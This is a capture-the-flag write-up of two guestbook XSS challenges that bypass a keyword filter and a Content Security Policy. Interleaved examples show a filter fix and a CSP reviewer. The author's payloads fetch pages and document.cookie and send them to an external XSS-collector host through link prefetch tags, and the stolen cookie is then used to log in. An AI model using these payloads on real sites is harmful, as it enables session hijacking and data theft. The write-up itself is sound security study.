Then I started trying things and found that it filters a lot, but the rule is only to replace strings such as script, on and link with the empty string, without any recursive replacement, so writing the keyword twice (nested inside itself) bypasses the filter. Next comes the policy problem; the Content-Security-Policy header is:

```http
content-security-policy:default-src 'self'; script-src 'self' 'unsafe-inline'; font-src 'self' fonts.gstatic.com; style-src 'self' 'unsafe-inline'; img-src 'self'
```

It allows inline scripts to execute, and from http://lorexxar.cn/2016/08/08/ccsp/#object-src we know that `<link rel="prefetch" href="xxx">` can be used to get data out. What I did here is somewhat convoluted: I run inline JS that fetches the page, then build a link tag whose href points to my XSS platform, as follows:

```html
</li><scrscriptipt src="./js/jquery.min.js"></scriscriptpt><scriscriptpt>
$.get("http://guestbook.hctf.io/admin_lorexxar.php",functioonn(data,status){
      var head = document.getElementsByTagName("body")[0];
      var cssURL="http://104.160.43.154/xss/?a="+escape(data);
      var Tag = document.createElement("lilinknk");
      Tag.href = cssURL;
      Tag.setAttribute("rel","prefetch");
      head.appendChild(Tag);
})</scscriptript><li>
```
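As an added example (not the challenge's filter, whose source the writeup never shows), the single-pass keyword strip the writeup infers from the site's behaviour, beside a version that strips until the text stops changing and the output encoding that makes a keyword list unnecessary. The banned words are the three the writeup names.

```javascript
// The three keywords the writeup found being removed.
const BANNED = ["script", "on", "link"];

// What the guestbook apparently did: delete each keyword exactly once.
// A keyword split by a copy of itself reassembles after the removal.
function stripOnce(input) {
  let out = input;
  for (const w of BANNED) out = out.split(w).join("");
  return out;
}

// Same blacklist, but repeated until a pass changes nothing, so a nested
// keyword cannot survive. Still a blacklist: anything not listed passes.
function stripUntilStable(input) {
  let prev, out = input;
  do { prev = out; out = stripOnce(out); } while (out !== prev);
  return out;
}

// The fix that does not depend on a word list: encode the characters
// that have meaning in HTML, so user text can never open a tag.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}
```

`stripOnce("<scrscriptipt>")` yields `<script>`, which is exactly why the payload above is spelled the way it is; `stripUntilStable` collapses the same input to `<>`, and `escapeHtml` leaves it as inert text.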

Then collect the flag on the XSS platform, as follows:

(screenshot)

The fourth line in the figure is our flag.

secret data

Another policy-bypass challenge, but this time inline scripts cannot execute. The CSP is as follows:

```http
default-src 'self';script-src http://sguestbook.hctf.io/static/ 'sha256-n+kMAVS5Xj7r/dvV9ZxAbEX6uEmK+uen+HZXbLhVsVA=' 'sha256-2zDCsAh4JN1o1lpARla6ieQ5KBrjrGpn0OAjeJ1V9kg=' 'sha256-SQQX1KpZM+ueZs+PyglurgqnV7jC8sJkUMsG9KkaFwQ=' 'sha256-JXk13NkH4FW9/ArNuoVR9yRcBH7qGllqf1g5RnJKUVg=' 'sha256-NL8WDWAX7GSifPUosXlt/TUI6H8JU0JlK7ACpDzRVUc=' 'sha256-CCZL85Vslsr/bWQYD45FX+dc7bTfBxfNmJtlmZYFxH4=' 'sha256-2Y8kG4IxBmLRnD13Ne2JV/V106nMhUqzbbVcOdxUH8I=' 'sha256-euY7jS9jMj42KXiApLBMYPZwZ6o97F7vcN8HjBFLOTQ=' 'sha256-V6Bq3u346wy1l0rOIp59A6RSX5gmAiSK40bp5JNrbnw=';font-src http://sguestbook.hctf.io/static/ fonts.gstatic.com;style-src 'self' 'unsafe-inline';img-src 'self'
```

It can only execute JS scripts under static, which is a headache: although there is an upload point at profile.php, the files are stored under upload, so they cannot be referenced directly.

Later, a directory scan found a redirect.php under its static directory that takes a parameter u and redirects to the page u points to. That makes it easy: point src at redirect.php and let it redirect to the JS file we uploaded under upload.

The uploaded JS file is as follows:

```javascript
$.get("http://sguestbook.hctf.io/profile.php",function(data,status){
    var head = document.getElementsByTagName("body")[0];
    var cssURL="[XSS platform URL]?a="+document.cookie+"|"+escape(data);
    var Tag = document.createElement("link");
    Tag.href = cssURL;
    Tag.setAttribute("rel","prefetch");
    head.appendChild(Tag);
})
```

My JS here also has it visit profile.php on the way; if the cookie had been placed in profile.php, that alone would have finished it.

The payload is as follows:

```html
<scrscriptipt src="./static/js/jquery.min.js"></scriscriptpt><scscriptript src="static/redirect.php?u=redirect.php?u=http://sguestbook.hctf.io/upload/xxxxxxxx"></scscriptript>
```
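As an added example (not from the writeup), a small CSP reviewer run over the two policies quoted in the guestbook and secret data sections. It parses the header into directives, applies the default-src fallback, and flags the two weaknesses the writeup exploited: `'unsafe-inline'` in script-src, and a path-restricted http source that an open redirect on that path turns into a whole-origin allowance (CSP source matching ignores the path part of a source expression once a redirect has occurred, which is why the redirect.php trick lands a script from /upload/ under a /static/ allowance). The policy strings are copied from the writeup; the finding texts are this example's own wording.

```javascript
// The two policies quoted in the writeup (copied verbatim; the first one
// still carries the header name in front of the value).
const CSP_GUESTBOOK = "content-security-policy:default-src 'self'; script-src 'self' 'unsafe-inline'; font-src 'self' fonts.gstatic.com; style-src 'self' 'unsafe-inline'; img-src 'self'";
const CSP_SECRET = "default-src 'self';script-src http://sguestbook.hctf.io/static/ 'sha256-n+kMAVS5Xj7r/dvV9ZxAbEX6uEmK+uen+HZXbLhVsVA=' 'sha256-2zDCsAh4JN1o1lpARla6ieQ5KBrjrGpn0OAjeJ1V9kg=' 'sha256-SQQX1KpZM+ueZs+PyglurgqnV7jC8sJkUMsG9KkaFwQ=' 'sha256-JXk13NkH4FW9/ArNuoVR9yRcBH7qGllqf1g5RnJKUVg=' 'sha256-NL8WDWAX7GSifPUosXlt/TUI6H8JU0JlK7ACpDzRVUc=' 'sha256-CCZL85Vslsr/bWQYD45FX+dc7bTfBxfNmJtlmZYFxH4=' 'sha256-2Y8kG4IxBmLRnD13Ne2JV/V106nMhUqzbbVcOdxUH8I=' 'sha256-euY7jS9jMj42KXiApLBMYPZwZ6o97F7vcN8HjBFLOTQ=' 'sha256-V6Bq3u346wy1l0rOIp59A6RSX5gmAiSK40bp5JNrbnw=';font-src http://sguestbook.hctf.io/static/ fonts.gstatic.com;style-src 'self' 'unsafe-inline';img-src 'self'";

// Split a policy into a Map of directive -> source list.
function parseCsp(header) {
  const body = header.replace(/^content-security-policy:\s*/i, "");
  const policy = new Map();
  for (const part of body.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return policy;
}

// Fetch directives (script-src, connect-src, ...) fall back to default-src.
function effectiveSources(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  return policy.get("default-src") || [];
}

const isHash = (s) => /^'sha(256|384|512)-/.test(s);

function reviewCsp(header) {
  const policy = parseCsp(header);
  const script = effectiveSources(policy, "script-src");
  const findings = [];
  if (script.includes("'unsafe-inline'")) {
    findings.push("script-src permits 'unsafe-inline': injected inline script executes");
  }
  for (const src of script) {
    if (/^https?:\/\/[^/]+\/./.test(src)) {
      findings.push(`script-src source ${src} is path-restricted, but a redirect served from that path makes the whole origin loadable`);
    }
    if (src.startsWith("http://")) {
      findings.push(`script-src source ${src} is plaintext http`);
    }
  }
  // Outbound channel: fetch/XHR is held to connect-src (the 'self'
  // fallback here), while this policy names no directive for
  // <link rel=prefetch>, which is how both payloads carry data out in a URL.
  const connect = effectiveSources(policy, "connect-src");
  findings.push(`connect-src resolves to [${connect.join(" ")}]; no directive in this policy covers <link rel=prefetch>`);
  return { hashes: script.filter(isHash).length, findings };
}
```

On the guestbook policy the reviewer reports the `'unsafe-inline'` allowance and no hashes; on the secret data policy it reports nine script hashes, no inline allowance, and the path-restricted plaintext source that the redirect.php chain exploits.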

The cookie is as follows:

(screenshot)

After getting the cookie, log in and obtain the flag, as shown below:

(screenshot)

PS: the directory scan also found a phpmyadmin here....
